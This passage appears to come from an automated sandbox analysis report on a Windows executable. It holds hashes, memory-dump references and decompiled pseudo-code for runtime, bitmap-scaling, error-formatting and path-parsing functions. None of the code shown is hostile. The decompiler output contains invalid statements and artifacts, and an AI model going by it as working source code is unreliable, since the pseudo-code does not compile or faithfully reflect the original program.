                                                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 001B1605
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                            • String ID:
                                                                            • API String ID: 1761009282-0
                                                                            • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                            • Instruction ID: 163b92bf61ad2e71abbe2562c789a839652a36bafea9b1c929d552e73fb6f42a
                                                                            • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                            • Instruction Fuzzy Hash: 48C04868400662B01C303AB523776ED23000DB37C9FC714C2FD56AB02BAFAA080F2872
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 51%
                                                                            			E001A975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                            				signed int _v0;
                                                                            				signed int _v4;
                                                                            				void _v68;
                                                                            				signed int _v72;
                                                                            				signed int _v76;
                                                                            				char _v112;
                                                                            				intOrPtr _v116;
                                                                            				intOrPtr* _v120;
                                                                            				short _v122;
                                                                            				short _v124;
                                                                            				signed int _v128;
                                                                            				signed int _v132;
                                                                            				signed int _v136;
                                                                            				intOrPtr* _v140;
                                                                            				char _v144;
                                                                            				intOrPtr* _v152;
                                                                            				intOrPtr _v156;
                                                                            				intOrPtr* _v164;
                                                                            				char _v180;
                                                                            				intOrPtr* _v184;
                                                                            				intOrPtr* _v192;
                                                                            				intOrPtr* _v200;
                                                                            				intOrPtr* _v212;
                                                                            				signed int _v216;
                                                                            				signed int _v220;
                                                                            				intOrPtr* _v224;
                                                                            				char _v228;
                                                                            				intOrPtr _v232;
                                                                            				void* __edi;
                                                                            				signed int _t71;
                                                                            				intOrPtr* _t77;
                                                                            				void* _t78;
                                                                            				intOrPtr* _t79;
                                                                            				intOrPtr* _t81;
                                                                            				short _t89;
                                                                            				intOrPtr* _t93;
                                                                            				intOrPtr* _t95;
                                                                            				intOrPtr* _t97;
                                                                            				intOrPtr* _t101;
                                                                            				signed int _t103;
                                                                            				intOrPtr* _t111;
                                                                            				intOrPtr* _t113;
                                                                            				intOrPtr* _t115;
                                                                            				signed int _t120;
                                                                            				intOrPtr _t124;
                                                                            				intOrPtr* _t132;
                                                                            				intOrPtr* _t134;
                                                                            				void* _t146;
                                                                            				void* _t149;
                                                                            				signed int _t152;
                                                                            				void* _t154;
                                                                            				long long* _t155;
                                                                            				long long _t158;
                                                                            
                                                                            				_t158 = __fp0;
                                                                            				if(E001A960F() != 0) {
                                                                            					_t146 = _a4;
                                                                            					GetObjectW(_t146, 0x18,  &_v68);
                                                                            					_t152 = _v4;
                                                                            					_t120 = _v0;
                                                                            					asm("cdq");
                                                                            					_t71 = _v72 * _t152 / _v76;
                                                                            					if(_t71 < _t120) {
                                                                            						_t120 = _t71;
                                                                            					}
                                                                            					_t149 = 0;
                                                                            					_push( &_v112);
                                                                            					_push(0x1c33ac);
                                                                            					_push(1);
                                                                            					_push(0);
                                                                            					_push(0x1c417c);
                                                                            					if( *0x1cdff4() < 0) {
                                                                            						L18:
                                                                            						return _t146;
                                                                            					} else {
                                                                            						_t77 = _v132;
                                                                            						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
                                                                            						_t79 = _v152;
                                                                            						if(_t78 >= 0) {
                                                                            							_v144 = 0;
                                                                            							_push( &_v144);
                                                                            							_push(_t79);
                                                                            							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
                                                                            								_t81 = _v152;
                                                                            								asm("fldz");
                                                                            								_push(0);
                                                                            								_t124 =  *_t81;
                                                                            								_push(_t124);
                                                                            								_push(_t124);
                                                                            								 *_t155 = _t158;
                                                                            								_push(0);
                                                                            								_push(0);
                                                                            								_push(0x1c418c);
                                                                            								_push(_v156);
                                                                            								_push(_t81);
                                                                            								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
                                                                            									E001AE920(_t146,  &_v136, 0, 0x2c);
                                                                            									_v136 = 0x28;
                                                                            									_v132 = _t152;
                                                                            									_v120 = 0;
                                                                            									_v128 =  ~_t120;
                                                                            									_v124 = 1;
                                                                            									_t89 = 0x20;
                                                                            									_v122 = _t89;
                                                                            									_t154 =  *0x1cdedc(0,  &_v136, 0,  &_v180, 0, 0);
                                                                            									asm("sbb ecx, ecx");
                                                                            									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
                                                                            										_t132 = _v216;
                                                                            										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
                                                                            										_t101 = _v120;
                                                                            										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
                                                                            										_t103 = _v136;
                                                                            										_push(_v232);
                                                                            										_t134 = _v140;
                                                                            										_v220 = _t103;
                                                                            										_v228 = 0;
                                                                            										_v224 = 0;
                                                                            										_v216 = _t120;
                                                                            										_push(_t103 * _t120 << 2);
                                                                            										_push(_v136 << 2);
                                                                            										_push( &_v228);
                                                                            										_push(_t134);
                                                                            										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
                                                                            											DeleteObject(_t154);
                                                                            										} else {
                                                                            											_t149 = _t154;
                                                                            										}
                                                                            										_t111 = _v164;
                                                                            										 *((intOrPtr*)( *_t111 + 8))(_t111);
                                                                            									}
                                                                            									_t93 = _v212;
                                                                            									 *((intOrPtr*)( *_t93 + 8))(_t93);
                                                                            									_t95 = _v212;
                                                                            									 *((intOrPtr*)( *_t95 + 8))(_t95);
                                                                            									_t97 = _v224;
                                                                            									 *((intOrPtr*)( *_t97 + 8))(_t97);
                                                                            									if(_t149 != 0) {
                                                                            										_t146 = _t149;
                                                                            									}
                                                                            									goto L18;
                                                                            								}
                                                                            								_t113 = _v184;
                                                                            								 *((intOrPtr*)( *_t113 + 8))(_t113);
                                                                            							}
                                                                            							_t115 = _v192;
                                                                            							 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                                            							_t79 = _v200;
                                                                            						}
                                                                            						 *((intOrPtr*)( *_t79 + 8))(_t79);
                                                                            						goto L18;
                                                                            					}
                                                                            				}
                                                                            				_push(_a12);
                                                                            				_push(_a8);
                                                                            				_push(_a4);
                                                                            				return E001A9954();
                                                                            			}
























































                                                                            0x00000000

                                                                            APIs
                                                                              • Part of subcall function 001A960F: GetDC.USER32(00000000), ref: 001A9613
                                                                              • Part of subcall function 001A960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 001A961E
                                                                              • Part of subcall function 001A960F: ReleaseDC.USER32(00000000,00000000), ref: 001A9629
                                                                            • GetObjectW.GDI32(?,00000018,?,00000000,?,77125B70), ref: 001A978E
                                                                              • Part of subcall function 001A9954: GetDC.USER32(00000000), ref: 001A995D
                                                                              • Part of subcall function 001A9954: GetObjectW.GDI32(?,00000018,?,?,?,77125B70,?,?,?,?,?,001A977A,?,?,?), ref: 001A998C
                                                                              • Part of subcall function 001A9954: ReleaseDC.USER32(00000000,?), ref: 001A9A20
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ObjectRelease$CapsDevice
                                                                            • String ID: (
                                                                            • API String ID: 1061551593-3887548279
                                                                            • Opcode ID: e6eb13767496135ac5b42d597c1f390651db1ea72380ff8a6a845f3afd5116b3
                                                                            • Instruction ID: 42649bc8fac897ca7b9c64462bb4846b64176220a86d252f28ba37978b74ddb0
                                                                            • Opcode Fuzzy Hash: e6eb13767496135ac5b42d597c1f390651db1ea72380ff8a6a845f3afd5116b3
                                                                            • Instruction Fuzzy Hash: BA6103B5208301AFD214CFA4C884E6BBBE9FF8A704F10495DF599CB261D771E945CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 17%
                                                                            			E001A0A9F(intOrPtr* __ecx) {
                                                                            				char _v516;
                                                                            				signed int _t26;
                                                                            				void* _t28;
                                                                            				void* _t32;
                                                                            				signed int _t33;
                                                                            				signed int _t34;
                                                                            				signed int _t35;
                                                                            				signed int _t38;
                                                                            				void* _t47;
                                                                            				void* _t48;
                                                                            
                                                                            				_t41 = __ecx;
                                                                            				_t44 = __ecx;
                                                                            				_t26 =  *(__ecx + 0x48);
                                                                            				_t47 = _t26 - 0x6f;
                                                                            				if(_t47 > 0) {
                                                                            					__eflags = _t26 - 0x7d;
                                                                            					if(_t26 == 0x7d) {
                                                                            						E001AC339();
                                                                            						_t28 = E0019DA42(_t41, 0x96);
                                                                            						return E001A9735( *0x1d75d8, E0019DA42(_t41, 0xc9), _t28, 0);
                                                                            					}
                                                                            				} else {
                                                                            					if(_t47 == 0) {
                                                                            						_push(0x456);
                                                                            						L38:
                                                                            						_push(E0019DA42(_t41));
                                                                            						_push( *_t44);
                                                                            						L19:
                                                                            						_t32 = E001AA57D();
                                                                            						L11:
                                                                            						return _t32;
                                                                            					}
                                                                            					_t48 = _t26 - 0x16;
                                                                            					if(_t48 > 0) {
                                                                            						__eflags = _t26 - 0x38;
                                                                            						if(__eflags > 0) {
                                                                            							_t33 = _t26 - 0x39;
                                                                            							__eflags = _t33;
                                                                            							if(_t33 == 0) {
                                                                            								_push(0x8c);
                                                                            								goto L38;
                                                                            							}
                                                                            							_t34 = _t33 - 1;
                                                                            							__eflags = _t34;
                                                                            							if(_t34 == 0) {
                                                                            								_push(0x6f);
                                                                            								goto L38;
                                                                            							}
                                                                            							_t35 = _t34 - 1;
                                                                            							__eflags = _t35;
                                                                            							if(_t35 == 0) {
                                                                            								_push( *((intOrPtr*)(__ecx + 4)));
                                                                            								_push(0x406);
                                                                            								goto L13;
                                                                            							}
                                                                            							_t38 = _t35 - 9;
                                                                            							__eflags = _t38;
                                                                            							if(_t38 == 0) {
                                                                            								_push(0x343);
                                                                            								goto L38;
                                                                            							}
                                                                            							_t26 = _t38 - 1;
                                                                            							__eflags = _t26;
                                                                            							if(_t26 == 0) {
                                                                            								_push(0x86);
                                                                            								goto L38;
                                                                            							}
                                                                            						} else {
                                                                            							if(__eflags == 0) {
                                                                            								_push(0x67);
                                                                            								goto L38;
                                                                            							}
                                                                            							_t26 = _t26 - 0x17;
                                                                            							__eflags = _t26 - 0xb;
                                                                            							if(_t26 <= 0xb) {
                                                                            								switch( *((intOrPtr*)(_t26 * 4 +  &M001A0D63))) {
                                                                            									case 0:
                                                                            										_push(0xde);
                                                                            										goto L18;
                                                                            									case 1:
                                                                            										_push(0xe1);
                                                                            										goto L18;
                                                                            									case 2:
                                                                            										_push(0xb4);
                                                                            										goto L38;
                                                                            									case 3:
                                                                            										_push(0x69);
                                                                            										goto L38;
                                                                            									case 4:
                                                                            										_push(0x6a);
                                                                            										goto L38;
                                                                            									case 5:
                                                                            										_push( *((intOrPtr*)(__esi + 4)));
                                                                            										_push(0x68);
                                                                            										goto L13;
                                                                            									case 6:
                                                                            										_push(0x46f);
                                                                            										goto L38;
                                                                            									case 7:
                                                                            										_push(0x470);
                                                                            										goto L38;
                                                                            									case 8:
                                                                            										_push( *((intOrPtr*)(__esi + 4)));
                                                                            										_push(0x471);
                                                                            										goto L13;
                                                                            									case 9:
                                                                            										goto L61;
                                                                            									case 0xa:
                                                                            										_push( *((intOrPtr*)(__esi + 4)));
                                                                            										_push(0x71);
                                                                            										goto L13;
                                                                            									case 0xb:
                                                                            										E0019DA42(__ecx, 0xc8) =  &_v516;
                                                                            										__eax = E00193E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
                                                                            										_push( *((intOrPtr*)(__esi + 8)));
                                                                            										__eax =  &_v516;
                                                                            										_push( &_v516);
                                                                            										return E001AA57D( *__esi, L"%s: %s");
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            					} else {
                                                                            						if(_t48 == 0) {
                                                                            							_push( *__ecx);
                                                                            							_push(0xdd);
                                                                            							L23:
                                                                            							E0019DA42(_t41);
                                                                            							L7:
                                                                            							_push(0);
                                                                            							L8:
                                                                            							return E001AA57D();
                                                                            						}
                                                                            						if(_t26 <= 0x15) {
                                                                            							switch( *((intOrPtr*)(_t26 * 4 +  &M001A0D0B))) {
                                                                            								case 0:
                                                                            									_push( *__esi);
                                                                            									_push(L"%ls");
                                                                            									_push(">");
                                                                            									goto L8;
                                                                            								case 1:
                                                                            									_push( *__ecx);
                                                                            									_push(L"%ls");
                                                                            									goto L7;
                                                                            								case 2:
                                                                            									_push(0);
                                                                            									__eax = E001A9D55();
                                                                            									goto L11;
                                                                            								case 3:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x7b);
                                                                            									goto L13;
                                                                            								case 4:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x7a);
                                                                            									goto L13;
                                                                            								case 5:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x7c);
                                                                            									goto L13;
                                                                            								case 6:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0xca);
                                                                            									goto L13;
                                                                            								case 7:
                                                                            									_push(0x70);
                                                                            									L18:
                                                                            									_push(E0019DA42(_t41));
                                                                            									_push(0);
                                                                            									goto L19;
                                                                            								case 8:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x72);
                                                                            									goto L13;
                                                                            								case 9:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x78);
                                                                            									goto L13;
                                                                            								case 0xa:
                                                                            									_push( *__esi);
                                                                            									_push(0x85);
                                                                            									goto L23;
                                                                            								case 0xb:
                                                                            									_push( *__esi);
                                                                            									_push(0x204);
                                                                            									goto L23;
                                                                            								case 0xc:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x84);
                                                                            									goto L13;
                                                                            								case 0xd:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x83);
                                                                            									goto L13;
                                                                            								case 0xe:
                                                                            									goto L61;
                                                                            								case 0xf:
                                                                            									_push( *((intOrPtr*)(__esi + 8)));
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									__eax = E0019DA42(__ecx, 0xd2);
                                                                            									return __eax;
                                                                            								case 0x10:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0x79);
                                                                            									goto L13;
                                                                            								case 0x11:
                                                                            									_push( *((intOrPtr*)(__esi + 4)));
                                                                            									_push(0xdc);
                                                                            									L13:
                                                                            									_push(E0019DA42(_t41));
                                                                            									_push( *_t44);
                                                                            									goto L8;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				L61:
                                                                            				return _t26;
                                                                            			}













                                                                            0x00000000
                                                                            0x001a0bf6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c08
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c0c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c10
                                                                            0x001a0c13
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c1a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c21
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c28
                                                                            0x001a0c2b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c35
                                                                            0x001a0c38
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0c4d
                                                                            0x001a0c59
                                                                            0x001a0c5e
                                                                            0x001a0c61
                                                                            0x001a0c67
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0bdb
                                                                            0x001a0bd5
                                                                            0x001a0ac6
                                                                            0x001a0ac6
                                                                            0x001a0bb7
                                                                            0x001a0bb9
                                                                            0x001a0b5b
                                                                            0x001a0b5b
                                                                            0x001a0ae3
                                                                            0x001a0ae3
                                                                            0x001a0ae5
                                                                            0x00000000
                                                                            0x001a0aea
                                                                            0x001a0acf
                                                                            0x001a0ad5
                                                                            0x00000000
                                                                            0x001a0af2
                                                                            0x001a0af4
                                                                            0x001a0af9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0adc
                                                                            0x001a0ade
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b00
                                                                            0x001a0b02
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b0d
                                                                            0x001a0b10
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b1c
                                                                            0x001a0b1f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b23
                                                                            0x001a0b26
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b2a
                                                                            0x001a0b2d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b34
                                                                            0x001a0b36
                                                                            0x001a0b3b
                                                                            0x001a0b3c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b46
                                                                            0x001a0b49
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b4d
                                                                            0x001a0b50
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b54
                                                                            0x001a0b56
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b63
                                                                            0x001a0b65
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b6c
                                                                            0x001a0b6f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b76
                                                                            0x001a0b79
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0b80
                                                                            0x001a0b83
                                                                            0x001a0b8b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0ba0
                                                                            0x001a0ba3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0baa
                                                                            0x001a0bad
                                                                            0x001a0b12
                                                                            0x001a0b17
                                                                            0x001a0b18
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x001a0ad5
                                                                            0x001a0acf
                                                                            0x001a0ac0
                                                                            0x001a0d09
                                                                            0x001a0d09

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _swprintf
                                                                            • String ID: %ls$%s: %s
                                                                            • API String ID: 589789837-2259941744
                                                                            • Opcode ID: 7be2025650fe7661209993384559b36d3d726b4c7dd15b5ff609b430567adc79
                                                                            • Instruction ID: 24928e7a3399d959597f50c4b4d933b467f4b31ca8c8b92001c7c47f4db1cd9c
                                                                            • Opcode Fuzzy Hash: 7be2025650fe7661209993384559b36d3d726b4c7dd15b5ff609b430567adc79
                                                                            • Instruction Fuzzy Hash: 1A514C3E68C300F9E62B1FD08E46F3235655B0FF04F618906B797654D6D79298607622
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E001B9E43(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                                                                            				intOrPtr _v0;
                                                                            				char _v6;
                                                                            				char _v8;
                                                                            				signed int _v12;
                                                                            				signed int _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v36;
                                                                            				intOrPtr* _v64;
                                                                            				intOrPtr _v96;
                                                                            				intOrPtr* _v100;
                                                                            				CHAR* _v104;
                                                                            				signed int _v116;
                                                                            				char _v290;
                                                                            				signed int _v291;
                                                                            				struct _WIN32_FIND_DATAA _v336;
                                                                            				union _FINDEX_INFO_LEVELS _v340;
                                                                            				signed int _v344;
                                                                            				signed int _v348;
                                                                            				intOrPtr _v440;
                                                                            				intOrPtr* _t80;
                                                                            				signed int _t82;
                                                                            				signed int _t87;
                                                                            				signed int _t91;
                                                                            				signed int _t93;
                                                                            				signed int _t95;
                                                                            				signed int _t96;
                                                                            				signed int _t100;
                                                                            				signed int _t103;
                                                                            				signed int _t108;
                                                                            				signed int _t111;
                                                                            				intOrPtr _t113;
                                                                            				signed char _t115;
                                                                            				union _FINDEX_INFO_LEVELS _t123;
                                                                            				signed int _t128;
                                                                            				signed int _t131;
                                                                            				void* _t136;
                                                                            				void* _t138;
                                                                            				signed int _t139;
                                                                            				signed int _t142;
                                                                            				signed int _t144;
                                                                            				signed int _t146;
                                                                            				signed int* _t147;
                                                                            				signed int _t150;
                                                                            				void* _t153;
                                                                            				CHAR* _t154;
                                                                            				char _t157;
                                                                            				char _t159;
                                                                            				intOrPtr* _t162;
                                                                            				void* _t163;
                                                                            				intOrPtr* _t164;
                                                                            				signed int _t166;
                                                                            				void* _t168;
                                                                            				intOrPtr* _t169;
                                                                            				signed int _t173;
                                                                            				signed int _t177;
                                                                            				signed int _t178;
                                                                            				intOrPtr* _t183;
                                                                            				void* _t192;
                                                                            				intOrPtr _t193;
                                                                            				signed int _t195;
                                                                            				signed int _t196;
                                                                            				signed int _t198;
                                                                            				signed int _t199;
                                                                            				signed int _t201;
                                                                            				union _FINDEX_INFO_LEVELS _t202;
                                                                            				signed int _t207;
                                                                            				signed int _t209;
                                                                            				signed int _t210;
                                                                            				void* _t212;
                                                                            				intOrPtr _t213;
                                                                            				void* _t214;
                                                                            				signed int _t218;
                                                                            				void* _t220;
                                                                            				signed int _t221;
                                                                            				void* _t222;
                                                                            				void* _t223;
                                                                            				void* _t224;
                                                                            				signed int _t225;
                                                                            				void* _t226;
                                                                            				void* _t227;
                                                                            
                                                                            				_t80 = _a8;
                                                                            				_t223 = _t222 - 0x20;
                                                                            				if(_t80 != 0) {
                                                                            					_t207 = _a4;
                                                                            					_t159 = 0;
                                                                            					 *_t80 = 0;
                                                                            					_t198 = 0;
                                                                            					_t150 = 0;
                                                                            					_v36 = 0;
                                                                            					_v336.cAlternateFileName = 0;
                                                                            					_v28 = 0;
                                                                            					__eflags =  *_t207;
                                                                            					if( *_t207 == 0) {
                                                                            						L9:
                                                                            						_v12 = _v12 & 0x00000000;
                                                                            						_t82 = _t150 - _t198;
                                                                            						_v8 = _t159;
                                                                            						_t190 = (_t82 >> 2) + 1;
                                                                            						__eflags = _t150 - _t198;
                                                                            						_v16 = (_t82 >> 2) + 1;
                                                                            						asm("sbb esi, esi");
                                                                            						_t209 =  !_t207 & _t82 + 0x00000003 >> 0x00000002;
                                                                            						__eflags = _t209;
                                                                            						if(_t209 != 0) {
                                                                            							_t196 = _t198;
                                                                            							_t157 = _t159;
                                                                            							do {
                                                                            								_t183 =  *_t196;
                                                                            								_t17 = _t183 + 1; // 0x1
                                                                            								_v8 = _t17;
                                                                            								do {
                                                                            									_t142 =  *_t183;
                                                                            									_t183 = _t183 + 1;
                                                                            									__eflags = _t142;
                                                                            								} while (_t142 != 0);
                                                                            								_t157 = _t157 + 1 + _t183 - _v8;
                                                                            								_t196 = _t196 + 4;
                                                                            								_t144 = _v12 + 1;
                                                                            								_v12 = _t144;
                                                                            								__eflags = _t144 - _t209;
                                                                            							} while (_t144 != _t209);
                                                                            							_t190 = _v16;
                                                                            							_v8 = _t157;
                                                                            							_t150 = _v336.cAlternateFileName;
                                                                            						}
                                                                            						_t210 = E001B6F0C(_t190, _v8, 1);
                                                                            						_t224 = _t223 + 0xc;
                                                                            						__eflags = _t210;
                                                                            						if(_t210 != 0) {
                                                                            							_t87 = _t210 + _v16 * 4;
                                                                            							_v20 = _t87;
                                                                            							_t191 = _t87;
                                                                            							_v16 = _t87;
                                                                            							__eflags = _t198 - _t150;
                                                                            							if(_t198 == _t150) {
                                                                            								L23:
                                                                            								_t199 = 0;
                                                                            								__eflags = 0;
                                                                            								 *_a8 = _t210;
                                                                            								goto L24;
                                                                            							} else {
                                                                            								_t93 = _t210 - _t198;
                                                                            								__eflags = _t93;
                                                                            								_v24 = _t93;
                                                                            								do {
                                                                            									_t162 =  *_t198;
                                                                            									_v12 = _t162 + 1;
                                                                            									do {
                                                                            										_t95 =  *_t162;
                                                                            										_t162 = _t162 + 1;
                                                                            										__eflags = _t95;
                                                                            									} while (_t95 != 0);
                                                                            									_t163 = _t162 - _v12;
                                                                            									_t35 = _t163 + 1; // 0x1
                                                                            									_t96 = _t35;
                                                                            									_push(_t96);
                                                                            									_v12 = _t96;
                                                                            									_t100 = E001BDD71(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
                                                                            									_t224 = _t224 + 0x10;
                                                                            									__eflags = _t100;
                                                                            									if(_t100 != 0) {
                                                                            										_push(0);
                                                                            										_push(0);
                                                                            										_push(0);
                                                                            										_push(0);
                                                                            										_push(0);
                                                                            										E001B7DBB();
                                                                            										asm("int3");
                                                                            										_t220 = _t224;
                                                                            										_push(_t163);
                                                                            										_t164 = _v64;
                                                                            										_t47 = _t164 + 1; // 0x1
                                                                            										_t192 = _t47;
                                                                            										do {
                                                                            											_t103 =  *_t164;
                                                                            											_t164 = _t164 + 1;
                                                                            											__eflags = _t103;
                                                                            										} while (_t103 != 0);
                                                                            										_push(_t198);
                                                                            										_t201 = _a8;
                                                                            										_t166 = _t164 - _t192 + 1;
                                                                            										_v12 = _t166;
                                                                            										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
                                                                            										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
                                                                            											_push(_t150);
                                                                            											_t50 = _t201 + 1; // 0x1
                                                                            											_t153 = _t50 + _t166;
                                                                            											_t212 = E001B7B1B(_t166, _t153, 1);
                                                                            											_t168 = _t210;
                                                                            											__eflags = _t201;
                                                                            											if(_t201 == 0) {
                                                                            												L34:
                                                                            												_push(_v12);
                                                                            												_t153 = _t153 - _t201;
                                                                            												_t108 = E001BDD71(_t168, _t212 + _t201, _t153, _v0);
                                                                            												_t225 = _t224 + 0x10;
                                                                            												__eflags = _t108;
                                                                            												if(__eflags != 0) {
                                                                            													goto L37;
                                                                            												} else {
                                                                            													_t136 = E001BA212(_a12, _t192, __eflags, _t212);
                                                                            													E001B7A50(0);
                                                                            													_t138 = _t136;
                                                                            													goto L36;
                                                                            												}
                                                                            											} else {
                                                                            												_push(_t201);
                                                                            												_t139 = E001BDD71(_t168, _t212, _t153, _a4);
                                                                            												_t225 = _t224 + 0x10;
                                                                            												__eflags = _t139;
                                                                            												if(_t139 != 0) {
                                                                            													L37:
                                                                            													_push(0);
                                                                            													_push(0);
                                                                            													_push(0);
                                                                            													_push(0);
                                                                            													_push(0);
                                                                            													E001B7DBB();
                                                                            													asm("int3");
                                                                            													_push(_t220);
                                                                            													_t221 = _t225;
                                                                            													_t226 = _t225 - 0x150;
                                                                            													_t111 =  *0x1cd668; // 0x44aa1787
                                                                            													_v116 = _t111 ^ _t221;
                                                                            													_t169 = _v100;
                                                                            													_push(_t153);
                                                                            													_t154 = _v104;
                                                                            													_push(_t212);
                                                                            													_t213 = _v96;
                                                                            													_push(_t201);
                                                                            													_v440 = _t213;
                                                                            													while(1) {
                                                                            														__eflags = _t169 - _t154;
                                                                            														if(_t169 == _t154) {
                                                                            															break;
                                                                            														}
                                                                            														_t113 =  *_t169;
                                                                            														__eflags = _t113 - 0x2f;
                                                                            														if(_t113 != 0x2f) {
                                                                            															__eflags = _t113 - 0x5c;
                                                                            															if(_t113 != 0x5c) {
                                                                            																__eflags = _t113 - 0x3a;
                                                                            																if(_t113 != 0x3a) {
                                                                            																	_t169 = E001BDDC0(_t154, _t169);
                                                                            																	continue;
                                                                            																}
                                                                            															}
                                                                            														}
                                                                            														break;
                                                                            													}
                                                                            													_t193 =  *_t169;
                                                                            													__eflags = _t193 - 0x3a;
                                                                            													if(_t193 != 0x3a) {
                                                                            														L47:
                                                                            														_t202 = 0;
                                                                            														__eflags = _t193 - 0x2f;
                                                                            														if(_t193 == 0x2f) {
                                                                            															L51:
                                                                            															_t115 = 1;
                                                                            															__eflags = 1;
                                                                            														} else {
